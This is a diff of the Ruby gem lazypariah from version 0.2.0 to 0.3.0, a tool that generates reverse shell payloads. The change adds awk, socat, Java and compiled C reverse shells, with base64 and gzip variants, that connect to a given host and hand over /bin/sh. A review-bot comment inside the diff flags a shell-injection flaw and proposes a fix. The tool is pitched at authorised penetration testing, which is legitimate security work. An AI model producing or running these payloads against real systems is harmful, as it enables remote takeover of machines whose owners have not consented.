lazypariah 0.2.0 → 0.3.0



Files changed (3) hide show
  1. checksums.yaml +4 -4
  2. data/bin/lazypariah +84 -3
  3. metadata +4 -3
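--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA256:
-metadata.gz: bd291a993c069eed15490793163c44f1a71ffa52a14a5764c100e67e9fd83387
-data.tar.gz: '0589412c913bccca3beff307194761fb0e495fdc2b2bb717e8f817587f294874'
+metadata.gz: ce53f8f317c07ff9692f984dcf1b4854ef9775f0cd10d62cbb010dd0d5a8f8a9
+data.tar.gz: 513ac2a8a3a6eef6548c5a7d515c5c5a55b63550ddbd432c49516a346f719984
 SHA512:
-metadata.gz: 18ee080a774d2d8606eb52afbc2c8ece30844a42b1dd9717acb55f9f271c81683a465ac2dcdb9fbbd89c8d4868795ea5131ebd631157d6348e46619ed86270d1
-data.tar.gz: 3ebcd058ab7994a3ed8b59b1b0c4df41779c0b349b143c0eac6913e1e71ad7c878f25d9cbe6f71e7a281b0fce707c108cb05dc66929367ffde2905196bddf060
+metadata.gz: b2a86bb13615232d2cc9610728084e466ec70f9bb91c972c0f557990efde7cebbaead6b47906d088facffc2e2d35755dbc7ff93482ee93c06c51666b1b641a8f
+data.tar.gz: 94da5b8370ffff1708d1c1e8c0b973f71d07d4c014592d5267f66fa61182a85fcf981e1928f63dc0241e5c54ea204bad29a5d0fa6fa7d3b23c665f1be0deb532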
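--- a/data/bin/lazypariah
+++ b/data/bin/lazypariah
@@ -1,7 +1,7 @@
 #!/usr/bin/env ruby
 #
 # Title: LAZYPARIAH
-# Version: 0.2.0
+# Version: 0.3.0
 # Description:
 # LAZYPARIAH is a simple tool for generating various reverse shell payloads
 # on the fly. It is intended to be used only in authorised circumstances by
@@ -24,10 +24,12 @@
 require "base64"
 require "optparse"
 require "erb"
+require "zlib"
+require "stringio"
 
 # Define constants.
 PROGRAM_NAME = "LAZYPARIAH".freeze()
-PROGRAM_VERSION = "0.2.0".freeze()
+PROGRAM_VERSION = "0.3.0".freeze()
 EXECUTABLE_NAME = "lazypariah".freeze()
 
 # Define payload list.
@@ -58,7 +60,16 @@ PAYLOAD_LIST = [
 "ruby",
 "ruby_c",
 "ruby_b64",
-"bash_tcp"
+"bash_tcp",
+"awk",
+"socat",
+"java_class_binary",
+"java_class_b64",
+"java_class_gzip_b64",
+"c_binary",
+"c_binary_b64",
+"c_binary_gzip",
+"c_binary_gzip_b64"
 ].sort()
 
 # Define function for displaying program information.
@@ -202,6 +213,76 @@ begin
 print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode)
 when "bash_tcp"
 print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode)
+when "awk"
+print_output("awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode=url_encode)
+when "socat"
+print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh")
+when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
+code = "import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;public class rs {public rs() throws Exception {Process p=new ProcessBuilder(\"/bin/sh\").redirectErrorStream(true).start();Socket s=new Socket(\"#{ARGV[1]}\",#{ARGV[2]});InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0) {so.write(pi.read());}while(pe.available()>0) {so.write(pe.read());}while(si.available()>0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}}"
+
+temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
+temp_file = temp_dir+"/rs.java"
+
+system("echo '#{code}' > #{temp_file}; javac #{temp_file};")
+
+File.open(temp_dir+"/rs.class", "r") do |f|
+java_payload = f.read()
+case ARGV[0]
+when "java_class_binary"
+print_output(java_payload)
+when "java_class_b64"
+java_payload_b64 = Base64.strict_encode64(java_payload)
+print_output(java_payload_b64, url_encode=url_encode)
+when "java_class_gzip_b64"
+sio = StringIO.new()
+sio.binmode()
+gz = Zlib::GzipWriter.new(sio)
+gz.write(java_payload)
+gz.close()
+java_payload_gzip = sio.string
+java_payload_gzip_b64 = Base64.strict_encode64(java_payload_gzip)
+print_output(java_payload_gzip_b64, url_encode=url_encode)
+end
+end
+
+system("rm -r #{temp_dir}")
+when "c_binary", "c_binary_gzip", "c_binary_b64", "c_binary_gzip_b64"
+code = "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\nint main(void){int port = #{ARGV[2]};struct sockaddr_in revsockaddr;int sockt = socket(AF_INET, SOCK_STREAM, 0);revsockaddr.sin_family = AF_INET;revsockaddr.sin_port = htons(port);revsockaddr.sin_addr.s_addr = inet_addr(\"#{ARGV[1]}\");connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));dup2(sockt, 0);dup2(sockt, 1);dup2(sockt, 2);char * const argv[] = {\"/bin/sh\", NULL};execve(\"/bin/sh\", argv, NULL);\nreturn 0;}"
+
+temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
+temp_file = temp_dir+"/rs.c"
+
+system("echo '#{code}' > #{temp_file}; gcc #{temp_file} -o #{temp_dir+"/rs"};")
+
+File.open(temp_dir+"/rs", "r") do |f|
+binary_payload = f.read()
+case ARGV[0]
+when "c_binary"
+print_output(binary_payload)
+when "c_binary_b64"
+binary_payload_b64 = Base64.strict_encode64(binary_payload)
+print_output(binary_payload_b64)
+when "c_binary_gzip"
+sio = StringIO.new()
+sio.binmode()
+gz = Zlib::GzipWriter.new(sio)
+gz.write(binary_payload)
+gz.close()
+binary_payload_gzip = sio.string
+print_output(binary_payload_gzip, url_encode)
+when "c_binary_gzip_b64"
+sio = StringIO.new()
+sio.binmode()
+gz = Zlib::GzipWriter.new(sio)
+gz.write(binary_payload)
+gz.close()
+binary_payload_gzip = sio.string
+binary_payload_gzip_b64 = Base64.strict_encode64(binary_payload_gzip)
+print_output(binary_payload_gzip_b64, url_encode=url_encode)
+end
+end
+
+system("rm -r #{temp_dir}")
 end
 end
 end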
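Review bot: In the java_class_* and c_binary_* branches the host and port from ARGV[1]/ARGV[2] are interpolated into the source template and then into a shell string, `system("echo '#{code}' > #{temp_file}; javac #{temp_file};")`, so a single quote in either argument breaks out of the quoting and runs arbitrary shell on the operator's own machine. Writing the template with File.write and invoking javac, gcc and rm in argv form (`system("gcc", temp_file, "-o", temp_dir+"/rs")`) keeps ARGV out of the shell entirely and also stops echo from re-interpreting the source text. The compiler's exit status is never checked, so a failed javac/gcc surfaces as an Errno::ENOENT from File.open and the temp directory is left behind because `rm -r` is not in an ensure; opening the compiled output with mode "rb" also avoids tagging binary bytes as UTF-8 text before Base64/gzip. Separately, the socat, java_class_binary, c_binary and c_binary_b64 calls omit the url_encode argument that every other payload passes, which looks like an oversight. The enclosing case and begin start before this hunk; the rewrite below shows the Java branch, and the C branch mirrors it.

```ruby
when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
  # … unchanged: Java source template assigned to `code` …
  temp_dir = IO.popen(["mktemp", "-dt", "lazypariah_XXXXXXXX"]).read().chomp()
  temp_file = temp_dir+"/rs.java"
  begin
    # ARGV-derived text never passes through a shell: write the file directly
    # and exec the compiler with an argv, then check its exit status.
    File.write(temp_file, code)
    raise "javac failed for #{temp_file}" unless system("javac", temp_file)
    File.open(temp_dir+"/rs.class", "rb") do |f|
      # … unchanged: java_payload read and the java_class_* output cases …
    end
  ensure
    system("rm", "-r", temp_dir)
  end
```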
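--- a/metadata
+++ b/metadata
@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: lazypariah
 version: !ruby/object:Gem::Version
-version: 0.2.0
+version: 0.3.0
 platform: ruby
 authors:
 - Peter Funnell
 autorequire:
 bindir: bin
 cert_chain: []
-date: 2020-11-22 00:00:00.000000000 Z
+date: 2020-11-23 00:00:00.000000000 Z
 dependencies: []
 description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
 on the fly. It is intended to be used only in authorised circumstances by qualified
@@ -42,7 +42,8 @@ required_rubygems_version: !ruby/object:Gem::Requirement
 - !ruby/object:Gem::Version
 version: '0'
 requirements:
-- A GNU/Linux or BSD operating system.
+- A GNU/Linux or BSD operating system. Optional requirements are GCC (for C payloads)
+and OpenJDK (for Java payloads).
 rubygems_version: 3.1.2
 signing_key:
 specification_version: 4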